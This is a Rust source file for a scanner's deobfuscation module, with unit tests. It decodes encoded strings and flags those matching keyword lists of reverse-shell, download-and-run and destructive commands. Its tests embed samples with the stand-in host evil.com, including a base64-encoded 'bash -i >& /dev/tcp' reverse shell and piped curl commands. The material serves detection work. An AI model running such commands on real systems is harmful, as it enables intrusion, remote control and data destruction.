1use base64::Engine;
2use regex::Regex;
3use std::sync::LazyLock;
4
5pub struct Deobfuscator;
7
8static BASE64_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
9 Regex::new(r"(?:[A-Za-z0-9+/]{4}){4,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?")
10 .expect("BASE64 regex")
11});
12static HEX_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
13 Regex::new(r"(?:\\x[0-9A-Fa-f]{2}){4,}|(?:0x[0-9A-Fa-f]{2}){4,}").expect("HEX regex")
14});
15static URL_ENCODED_PATTERN: LazyLock<Regex> =
16 LazyLock::new(|| Regex::new(r"(?:%[0-9A-Fa-f]{2}){4,}").expect("URL encoded regex"));
17static UNICODE_ESCAPE_PATTERN: LazyLock<Regex> =
18 LazyLock::new(|| Regex::new(r"(?:\\u[0-9A-Fa-f]{4}){2,}").expect("Unicode escape regex"));
19static CHAR_CODE_PATTERN: LazyLock<Regex> =
20 LazyLock::new(|| Regex::new(r"String\.fromCharCode\s*\([\d,\s]+\)").expect("CharCode regex"));
21
22impl Deobfuscator {
23 pub fn new() -> Self {
24 Self
25 }
26
27 pub fn deobfuscate(&self, content: &str) -> Vec<DecodedContent> {
29 let mut results = Vec::new();
30
31 for decoded in self.decode_base64(content) {
33 results.push(decoded);
34 }
35
36 for decoded in self.decode_hex(content) {
38 results.push(decoded);
39 }
40
41 for decoded in self.decode_url(content) {
43 results.push(decoded);
44 }
45
46 for decoded in self.decode_unicode_escapes(content) {
48 results.push(decoded);
49 }
50
51 for decoded in self.decode_char_code(content) {
53 results.push(decoded);
54 }
55
56 results
57 }
58
59 fn decode_base64(&self, content: &str) -> Vec<DecodedContent> {
61 let mut results = Vec::new();
62
63 for cap in BASE64_PATTERN.find_iter(content) {
64 let encoded = cap.as_str();
65 if encoded.len() < 20 {
67 continue;
68 }
69
70 if let Ok(decoded_bytes) = base64::engine::general_purpose::STANDARD.decode(encoded)
71 && let Ok(decoded_str) = String::from_utf8(decoded_bytes)
72 && self.is_suspicious(&decoded_str)
73 {
74 results.push(DecodedContent {
75 original: encoded.to_string(),
76 decoded: decoded_str,
77 encoding: "base64".to_string(),
78 });
79 }
80 }
81
82 results
83 }
84
85 fn decode_hex(&self, content: &str) -> Vec<DecodedContent> {
87 let mut results = Vec::new();
88
89 for cap in HEX_PATTERN.find_iter(content) {
90 let encoded = cap.as_str();
91
92 let hex_bytes: Vec<u8> = if encoded.starts_with("\\x") {
94 encoded
95 .split("\\x")
96 .filter(|s| !s.is_empty())
97 .filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
98 .collect()
99 } else {
100 encoded
102 .split("0x")
103 .filter(|s| !s.is_empty())
104 .filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
105 .collect()
106 };
107
108 if let Ok(decoded_str) = String::from_utf8(hex_bytes)
109 && self.is_suspicious(&decoded_str)
110 {
111 results.push(DecodedContent {
112 original: encoded.to_string(),
113 decoded: decoded_str,
114 encoding: "hex".to_string(),
115 });
116 }
117 }
118
119 results
120 }
121
122 fn decode_url(&self, content: &str) -> Vec<DecodedContent> {
124 let mut results = Vec::new();
125
126 for cap in URL_ENCODED_PATTERN.find_iter(content) {
127 let encoded = cap.as_str();
128
129 let mut decoded_bytes = Vec::new();
131 let mut chars = encoded.chars().peekable();
132
133 while let Some(c) = chars.next() {
134 if c == '%' {
135 let hex: String = chars.by_ref().take(2).collect();
136 if let Ok(byte) = u8::from_str_radix(&hex, 16) {
137 decoded_bytes.push(byte);
138 }
139 } else {
140 decoded_bytes.push(c as u8);
141 }
142 }
143
144 if let Ok(decoded_str) = String::from_utf8(decoded_bytes)
145 && self.is_suspicious(&decoded_str)
146 {
147 results.push(DecodedContent {
148 original: encoded.to_string(),
149 decoded: decoded_str,
150 encoding: "url".to_string(),
151 });
152 }
153 }
154
155 results
156 }
157
158 fn decode_unicode_escapes(&self, content: &str) -> Vec<DecodedContent> {
160 let mut results = Vec::new();
161
162 for cap in UNICODE_ESCAPE_PATTERN.find_iter(content) {
163 let encoded = cap.as_str();
164 let mut decoded = String::new();
165
166 let mut chars = encoded.chars().peekable();
167 while let Some(c) = chars.next() {
168 if c == '\\' && chars.peek() == Some(&'u') {
169 chars.next(); let hex: String = chars.by_ref().take(4).collect();
171 if let Ok(code_point) = u32::from_str_radix(&hex, 16)
172 && let Some(ch) = char::from_u32(code_point)
173 {
174 decoded.push(ch);
175 }
176 } else {
177 decoded.push(c);
178 }
179 }
180
181 if self.is_suspicious(&decoded) {
182 results.push(DecodedContent {
183 original: encoded.to_string(),
184 decoded,
185 encoding: "unicode".to_string(),
186 });
187 }
188 }
189
190 results
191 }
192
193 fn decode_char_code(&self, content: &str) -> Vec<DecodedContent> {
195 let mut results = Vec::new();
196
197 for cap in CHAR_CODE_PATTERN.find_iter(content) {
198 let encoded = cap.as_str();
199
200 let numbers: Vec<u32> = encoded
202 .split(|c: char| !c.is_ascii_digit())
203 .filter(|s| !s.is_empty())
204 .filter_map(|s| s.parse().ok())
205 .collect();
206
207 let decoded: String = numbers.iter().filter_map(|&n| char::from_u32(n)).collect();
208
209 if self.is_suspicious(&decoded) {
210 results.push(DecodedContent {
211 original: encoded.to_string(),
212 decoded,
213 encoding: "charcode".to_string(),
214 });
215 }
216 }
217
218 results
219 }
220
221 fn is_suspicious(&self, content: &str) -> bool {
223 let suspicious_patterns = [
224 "eval",
225 "exec",
226 "bash",
227 "sh -c",
228 "/bin/",
229 "curl ",
230 "wget ",
231 "nc ",
232 "netcat",
233 "/dev/tcp",
234 "/dev/udp",
235 "base64 -d",
236 "python -c",
237 "ruby -e",
238 "perl -e",
239 "powershell",
240 "cmd.exe",
241 "rm -rf",
242 "chmod ",
243 "sudo ",
244 "password",
245 "secret",
246 "api_key",
247 "token",
248 "credential",
249 "http://",
250 "https://",
251 "ftp://",
252 ];
253
254 let content_lower = content.to_lowercase();
255 suspicious_patterns
256 .iter()
257 .any(|p| content_lower.contains(p))
258 }
259
260 pub fn deep_scan(&self, content: &str, file_path: &str) -> Vec<crate::rules::Finding> {
262 use crate::scanner::ScannerConfig;
263
264 let mut findings = Vec::new();
265 let config = ScannerConfig::new();
266
267 findings.extend(config.check_content(content, file_path));
269
270 for decoded in self.deobfuscate(content) {
272 let context = format!("{}:decoded:{}", file_path, decoded.encoding);
273
274 for mut finding in config.check_content(&decoded.decoded, &context) {
276 finding.message = format!(
278 "{} [Decoded from {} encoded content]",
279 finding.message, decoded.encoding
280 );
281 findings.push(finding);
282 }
283
284 if decoded.decoded.len() > 10 && self.is_highly_suspicious(&decoded.decoded) {
286 findings.push(crate::rules::Finding {
287 id: "OB-DEEP-001".to_string(),
288 severity: crate::rules::Severity::High,
289 category: crate::rules::Category::Obfuscation,
290 confidence: crate::rules::Confidence::Firm,
291 name: "Obfuscated suspicious content".to_string(),
292 location: crate::rules::Location {
293 file: file_path.to_string(),
294 line: 0,
295 column: None,
296 },
297 code: decoded.original.chars().take(100).collect::<String>() + "...",
298 message: format!(
299 "Found {} encoded content that decodes to suspicious payload",
300 decoded.encoding
301 ),
302 recommendation: "Review the decoded content for malicious commands or URLs"
303 .to_string(),
304 fix_hint: None,
305 cwe_ids: vec!["CWE-116".to_string()],
306 rule_severity: None,
307 client: None,
308 context: None,
309 });
310 }
311 }
312
313 findings
314 }
315
316 fn is_highly_suspicious(&self, content: &str) -> bool {
318 let highly_suspicious = [
319 "bash -i",
320 "/dev/tcp/",
321 "nc -e",
322 "rm -rf /",
323 "curl | bash",
324 "wget | sh",
325 "eval(base64",
326 "exec(decode",
327 ];
328
329 let content_lower = content.to_lowercase();
330 highly_suspicious.iter().any(|p| content_lower.contains(p))
331 }
332}
333
334impl Default for Deobfuscator {
335 fn default() -> Self {
336 Self::new()
337 }
338}
339
340#[derive(Debug, Clone)]
342pub struct DecodedContent {
343 pub original: String,
344 pub decoded: String,
345 pub encoding: String,
346}
347
348#[cfg(test)]
349mod tests {
350 use super::*;
351
352 #[test]
353 fn test_decode_base64() {
354 let deob = Deobfuscator::new();
355 let content = "Y3VybCBodHRwOi8vZXZpbC5jb20=";
357 let results = deob.decode_base64(content);
358 assert!(!results.is_empty());
359 assert!(results[0].decoded.contains("curl"));
360 }
361
362 #[test]
363 fn test_decode_hex() {
364 let deob = Deobfuscator::new();
365 let content = r"\x63\x75\x72\x6c\x20\x68\x74\x74\x70";
367 let results = deob.decode_hex(content);
368 assert!(!results.is_empty());
369 assert!(results[0].decoded.contains("curl"));
370 }
371
372 #[test]
373 fn test_decode_url() {
374 let deob = Deobfuscator::new();
375 let content = "%63%75%72%6c%20%68%74%74%70";
377 let results = deob.decode_url(content);
378 assert!(!results.is_empty());
379 assert!(results[0].decoded.contains("curl"));
380 }
381
382 #[test]
383 fn test_decode_charcode() {
384 let deob = Deobfuscator::new();
385 let content = "String.fromCharCode(101,118,97,108)";
387 let results = deob.decode_char_code(content);
388 assert!(!results.is_empty());
389 assert!(results[0].decoded.contains("eval"));
390 }
391
392 #[test]
393 fn test_is_suspicious() {
394 let deob = Deobfuscator::new();
395 assert!(deob.is_suspicious("curl http://example.com"));
396 assert!(deob.is_suspicious("bash -c 'evil command'"));
397 assert!(deob.is_suspicious("password=secret123"));
398 assert!(!deob.is_suspicious("hello world"));
399 }
400
401 #[test]
402 fn test_deep_scan() {
403 let deob = Deobfuscator::new();
404 let content = "normal text\nYmFzaCAtaSA+JiAvZGV2L3RjcC9ldmlsLmNvbS8xMjM0 # hidden payload";
407 let findings = deob.deep_scan(content, "test.sh");
408 assert!(
410 findings
411 .iter()
412 .any(|f| f.id == "OB-DEEP-001" || f.message.contains("Decoded"))
413 );
414 }
415
416 #[test]
417 fn test_deobfuscate_empty() {
418 let deob = Deobfuscator::new();
419 let results = deob.deobfuscate("normal text without obfuscation");
420 assert!(results.is_empty());
421 }
422
423 #[test]
424 fn test_default_trait() {
425 let deob = Deobfuscator;
426 assert!(!deob.is_suspicious("hello"));
427 }
428
429 #[test]
430 fn test_decode_unicode_escapes() {
431 let deob = Deobfuscator::new();
432 let content = r"\u0065\u0076\u0061\u006c";
434 let results = deob.decode_unicode_escapes(content);
435 assert!(!results.is_empty());
436 assert!(results[0].decoded.contains("eval"));
437 }
438
439 #[test]
440 fn test_decode_base64_short_string() {
441 let deob = Deobfuscator::new();
442 let content = "YWJjZA=="; let results = deob.decode_base64(content);
445 assert!(results.is_empty());
446 }
447
448 #[test]
449 fn test_decode_base64_non_suspicious() {
450 let deob = Deobfuscator::new();
451 let content = "dGhpcyBpcyBhIG5vcm1hbCBzYWZlIHRleHQ="; let results = deob.decode_base64(content);
454 assert!(results.is_empty());
455 }
456
457 #[test]
458 fn test_decode_hex_0x_format() {
459 let deob = Deobfuscator::new();
460 let content = "0x630x750x720x6c0x200x680x740x740x70";
462 let results = deob.decode_hex(content);
463 assert!(!results.is_empty());
464 assert!(results[0].decoded.contains("curl"));
465 }
466
467 #[test]
468 fn test_is_highly_suspicious() {
469 let deob = Deobfuscator::new();
470 assert!(deob.is_highly_suspicious("bash -i >& /dev/tcp/"));
471 assert!(deob.is_highly_suspicious("rm -rf /"));
472 assert!(deob.is_highly_suspicious("curl | bash something"));
473 assert!(deob.is_highly_suspicious("wget | sh something"));
474 assert!(deob.is_highly_suspicious("nc -e /bin/bash"));
475 assert!(deob.is_highly_suspicious("eval(base64"));
476 assert!(deob.is_highly_suspicious("exec(decode"));
477 assert!(!deob.is_highly_suspicious("echo hello"));
478 }
479
480 #[test]
481 fn test_deobfuscate_with_base64() {
482 let deob = Deobfuscator::new();
483 let content = "command=Y3VybCBodHRwOi8vZXZpbC5jb20="; let results = deob.deobfuscate(content);
486 assert!(!results.is_empty());
487 }
488
489 #[test]
490 fn test_deobfuscate_multiple_encodings() {
491 let deob = Deobfuscator::new();
492 let content =
494 r"data=Y3VybCBodHRwOi8vZXZpbC5jb20=; exec \x63\x75\x72\x6c\x20\x68\x74\x74\x70";
495 let results = deob.deobfuscate(content);
496 assert!(!results.is_empty());
498 }
499
500 #[test]
501 fn test_deep_scan_clean_content() {
502 let deob = Deobfuscator::new();
503 let content = "normal clean content without any issues";
504 let findings = deob.deep_scan(content, "test.txt");
505 assert!(findings.is_empty());
507 }
508
509 #[test]
510 fn test_deep_scan_with_suspicious_decoded() {
511 let deob = Deobfuscator::new();
512 let content = "payload=Y3VybCBodHRwOi8vZXhhbXBsZS5jb20vZG93bmxvYWQuc2g="; let findings = deob.deep_scan(content, "test.sh");
515 let _ = findings;
518 }
519
520 #[test]
521 fn test_decoded_content_debug_trait() {
522 let content = DecodedContent {
523 original: "abc".to_string(),
524 decoded: "xyz".to_string(),
525 encoding: "base64".to_string(),
526 };
527 let debug_str = format!("{:?}", content);
528 assert!(debug_str.contains("DecodedContent"));
529 assert!(debug_str.contains("abc"));
530 }
531
532 #[test]
533 fn test_decoded_content_clone_trait() {
534 let content = DecodedContent {
535 original: "abc".to_string(),
536 decoded: "xyz".to_string(),
537 encoding: "base64".to_string(),
538 };
539 let cloned = content.clone();
540 assert_eq!(content.original, cloned.original);
541 assert_eq!(content.decoded, cloned.decoded);
542 assert_eq!(content.encoding, cloned.encoding);
543 }
544
545 #[test]
546 fn test_is_suspicious_various_patterns() {
547 let deob = Deobfuscator::new();
548 assert!(deob.is_suspicious("wget http://evil.com"));
549 assert!(deob.is_suspicious("nc -l 1234"));
550 assert!(deob.is_suspicious("netcat connection"));
551 assert!(deob.is_suspicious("/dev/tcp/evil"));
552 assert!(deob.is_suspicious("/dev/udp/evil"));
553 assert!(deob.is_suspicious("base64 -d | bash"));
554 assert!(deob.is_suspicious("python -c 'import os'"));
555 assert!(deob.is_suspicious("ruby -e 'exec'"));
556 assert!(deob.is_suspicious("perl -e 'system'"));
557 assert!(deob.is_suspicious("powershell.exe"));
558 assert!(deob.is_suspicious("cmd.exe /c"));
559 assert!(deob.is_suspicious("rm -rf /tmp"));
560 assert!(deob.is_suspicious("chmod 777 file"));
561 assert!(deob.is_suspicious("sudo rm"));
562 assert!(deob.is_suspicious("api_key=secret"));
563 assert!(deob.is_suspicious("token=abc123"));
564 assert!(deob.is_suspicious("credential_store"));
565 assert!(deob.is_suspicious("ftp://server"));
566 }
567
568 #[test]
569 fn test_decode_url_non_suspicious() {
570 let deob = Deobfuscator::new();
571 let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64";
573 let results = deob.decode_url(content);
574 assert!(results.is_empty());
576 }
577
578 #[test]
579 fn test_decode_hex_non_suspicious() {
580 let deob = Deobfuscator::new();
581 let content = r"\x68\x65\x6c\x6c\x6f";
583 let results = deob.decode_hex(content);
584 assert!(results.is_empty());
585 }
586
587 #[test]
588 fn test_decode_charcode_non_suspicious() {
589 let deob = Deobfuscator::new();
590 let content = "String.fromCharCode(104,101,108,108,111)";
592 let results = deob.decode_char_code(content);
593 assert!(results.is_empty());
594 }
595
596 #[test]
597 fn test_decode_unicode_non_suspicious() {
598 let deob = Deobfuscator::new();
599 let content = r"\u0061\u0062";
601 let results = deob.decode_unicode_escapes(content);
602 assert!(results.is_empty());
603 }
604
605 #[test]
606 fn test_deep_scan_original_content_finding() {
607 let deob = Deobfuscator::new();
608 let content = "sudo rm -rf /important/files";
611 let findings = deob.deep_scan(content, "script.sh");
612 assert!(!findings.is_empty());
614 }
615
616 #[test]
617 fn test_deobfuscate_with_url_encoding() {
618 let deob = Deobfuscator::new();
619 let content = "command=%63%75%72%6c%20http://evil.com";
621 let results = deob.deobfuscate(content);
622 assert!(results.iter().any(|r| r.encoding == "url"));
624 }
625
626 #[test]
627 fn test_deobfuscate_with_unicode_escapes() {
628 let deob = Deobfuscator::new();
629 let content = r"var cmd = '\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070'";
631 let results = deob.deobfuscate(content);
632 assert!(results.iter().any(|r| r.encoding == "unicode"));
634 }
635
636 #[test]
637 fn test_deobfuscate_with_charcode() {
638 let deob = Deobfuscator::new();
639 let content = "var x = String.fromCharCode(99,117,114,108,32,104,116,116,112)";
641 let results = deob.deobfuscate(content);
642 assert!(results.iter().any(|r| r.encoding == "charcode"));
644 }
645
646 #[test]
647 fn test_url_decode_with_only_percent_encoded() {
648 let deob = Deobfuscator::new();
649 let content = "%63%75%72%6c%20%68%74%74%70%3a%2f%2f";
652 let results = deob.decode_url(content);
653 assert!(!results.is_empty());
655 assert!(results[0].decoded.contains("curl"));
656 assert!(results[0].decoded.contains("http"));
657 }
658
659 #[test]
660 fn test_unicode_decode_multiple_escapes() {
661 let deob = Deobfuscator::new();
662 let content = r"\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070";
665 let results = deob.decode_unicode_escapes(content);
666 assert!(!results.is_empty());
668 assert!(results[0].decoded.contains("curl"));
669 }
670
671 #[test]
672 fn test_deobfuscate_all_encodings_combined() {
673 let deob = Deobfuscator::new();
674 let content = r#"
676 url=%63%75%72%6c%20http
677 unicode=\u0065\u0076\u0061\u006c
678 charcode=String.fromCharCode(99,117,114,108)
679 hex=\x63\x75\x72\x6c\x20\x68\x74\x74\x70
680 base64=Y3VybCBodHRwOi8vZXZpbC5jb20=
681 "#;
682 let results = deob.deobfuscate(content);
683 assert!(!results.is_empty());
685 }
686
687 #[test]
688 fn test_deep_scan_with_deobfuscated_rule_match() {
689 let deob = Deobfuscator::new();
690 let base64_content = "c3VkbyBybSAtcmYgLw==";
693 let content = format!("execute={}", base64_content);
694 let findings = deob.deep_scan(&content, "test.sh");
695 let has_decoded_finding = findings
698 .iter()
699 .any(|f| f.message.contains("Decoded") || f.id.contains("OB-DEEP"));
700 assert!(has_decoded_finding || !findings.is_empty());
702 }
703
704 #[test]
705 fn test_url_decode_mixed_with_normal_chars() {
706 let deob = Deobfuscator::new();
707 let content = "cmd=%63%75%72%6c%20http://evil.com|bash";
710 let results = deob.deobfuscate(content);
711 let _ = results; }
715
716 #[test]
717 fn test_unicode_escape_mixed_chars() {
718 let deob = Deobfuscator::new();
719 let content = r"var x = '\u0063url \u0068ttp://evil.com'";
721 let results = deob.deobfuscate(content);
722 assert!(results.is_empty() || results.iter().any(|r| r.encoding == "unicode"));
724 }
725
726 #[test]
727 fn test_decode_hex_invalid_format() {
728 let deob = Deobfuscator::new();
729 let content = "\\x6Gurl \\x7Gttp"; let results = deob.deobfuscate(content);
732 assert!(results.is_empty() || results.iter().all(|r| r.encoding != "hex"));
734 }
735
736 #[test]
737 fn test_charcode_partial_match() {
738 let deob = Deobfuscator::new();
739 let content = "eval(String.fromCharCode(98,97,115,104))";
742 let results = deob.deobfuscate(content);
743 assert!(results.iter().any(|r| r.encoding == "charcode"));
745 }
746
747 #[test]
748 fn test_deobfuscator_default() {
749 let deob: Deobfuscator = Default::default();
751 assert!(!deob.is_suspicious("normal text"));
752 assert!(deob.is_suspicious("curl http://evil.com"));
753 }
754
755 #[test]
756 fn test_url_decode_mixed_with_plain_chars() {
757 let deob = Deobfuscator::new();
758 let content = "%63%75%72%6c%20%68%74%74%70"; let results = deob.decode_url(content);
764 assert!(!results.is_empty());
765 assert_eq!(results[0].encoding, "url");
766 }
767
768 #[test]
769 fn test_decode_url_hello_world_not_suspicious() {
770 let deob = Deobfuscator::new();
771 let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64"; let results = deob.decode_url(content);
774 assert!(results.is_empty());
776 }
777}